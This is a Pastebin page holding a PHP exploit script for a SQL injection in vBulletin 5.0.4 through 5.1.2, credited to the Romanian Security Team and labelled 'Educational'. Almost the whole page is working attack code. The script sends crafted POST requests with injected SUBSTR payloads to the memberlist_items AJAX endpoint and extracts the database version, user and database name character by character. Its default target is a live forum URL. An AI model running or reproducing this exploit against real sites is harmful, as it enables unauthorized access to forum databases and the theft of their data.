Googleinurl

[SCRIPT]=> EXPLOIT vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1 y 5.

Sep 3rd, 2014
3,793
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. /*
  4. Inyección SQL en los foros vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1 y 5.1.2 (Exploit + Video)
  5. http://www.blackploit.com/2014/07/inyeccion-sql-en-los-foros-vbulletin.html
  6.     Author: Nytro
  7.     Powered by: Romanian Security Team
  8.     Price: Free. Educational.
  9. */
  10.  
  11.  
  12. error_reporting(E_ALL);
  13. ini_set('display_errors', 1);
  14.  
  15.  
  16. // Get arguments
  17.  
  18.  
  19. $target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
  20. $expression = str_replace('/', '\\/', $target_url);
  21.  
  22.  
  23. // Function to send a POST request
  24.  
  25.  
  26. function httpPost($url,$params)
  27. {
  28.     $ch = curl_init($url);
  29.  
  30.  
  31.     curl_setopt($ch, CURLOPT_URL,$url);
  32.     curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
  33.     curl_setopt($ch, CURLOPT_HEADER, false);
  34.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  35.     curl_setopt($ch, CURLOPT_POST, 1);
  36.     curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
  37.      
  38.     curl_setopt($ch, CURLOPT_HTTPHEADER, array(
  39.         'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  40.         'Accept: application/json, text/javascript, */*; q=0.01',
  41.         'X-Requested-With: XMLHttpRequest',
  42.         'Referer: https://rstforums.com/v5/memberlist',
  43.         'Accept-Language: en-US,en;q=0.5',
  44.         'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
  45.      ));
  46.  
  47.  
  48.     $output = curl_exec($ch);
  49.      
  50.     if($output == FALSE) print htmlspecialchars(curl_error($ch));
  51.  
  52.  
  53.     curl_close($ch);
  54.     return $output;
  55. }
  56.  
  57.  
  58. // Function to get string between two other strings
  59.  
  60.  
  61. function get_string_between($string, $start, $end)
  62. {
  63.     $string = " ".$string;
  64.     $ini = strpos($string,$start);
  65.     if ($ini == 0) return "";
  66.     $ini += strlen($start);
  67.     $len = strpos($string,$end,$ini) - $ini;
  68.     return substr($string,$ini,$len);
  69. }
  70.  
  71.  
  72. // Get version
  73.  
  74.  
  75. print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
  76. print "Version: ";
  77.  
  78.  
  79. $result = httpPost($target_url . '/ajax/render/memberlist_items',
  80.         'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1  ,1)--+"+' .
  81.         '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  82.  
  83.  
  84. $letter = 1;
  85.  
  86.  
  87. while(strpos($result, 'No Users Matched Your Query') == false)
  88. {
  89.     $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
  90.  
  91.  
  92.     $username = get_string_between($exploded[1], '">', '<\/a>');
  93.     print $username[0];
  94.      
  95.     $letter++;
  96.     $result = httpPost($target_url . '/ajax/render/memberlist_items',
  97.             'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(  ),' . $letter . ',1)--+"+' .
  98.             '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  99. }
  100.  
  101.  
  102. // Get user
  103.  
  104.  
  105. print "\r\nUser: ";
  106.  
  107.  
  108. $result = httpPost($target_url . '/ajax/render/memberlist_items',
  109.         'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1  ,1)--+"+' .
  110.         '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  111.  
  112.  
  113. $letter = 1;
  114.  
  115.  
  116. while(strpos($result, 'No Users Matched Your Query') == false)
  117. {
  118.     $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
  119.  
  120.  
  121.     $username = get_string_between($exploded[1], '">', '<\/a>');
  122.     print $username[0];
  123.  
  124.  
  125.     $letter++;
  126.     $result = httpPost($target_url . '/ajax/render/memberlist_items',
  127.             'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
  128.             '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  129. }
  130.  
  131.  
  132. // Get database
  133.  
  134.  
  135. print "\r\nDatabse: ";
  136.  
  137.  
  138. $result = httpPost($target_url . '/ajax/render/memberlist_items',
  139.         'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  1,1)--+"+' .
  140.         '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  141.  
  142.  
  143. $letter = 1;
  144.  
  145.  
  146. while(strpos($result, 'No Users Matched Your Query') == false)
  147. {
  148.     $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
  149.  
  150.  
  151.     $username = get_string_between($exploded[1], '">', '<\/a>');
  152.     print $username[0];
  153.  
  154.  
  155.     $letter++;
  156.     $result = httpPost($target_url . '/ajax/render/memberlist_items',
  157.             'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  ' . $letter . ',1)--+"+' .
  158.             '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  159. }
  160.  
  161.  
  162. print "\r\n"
  163.  
  164.  
  165. ?>
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×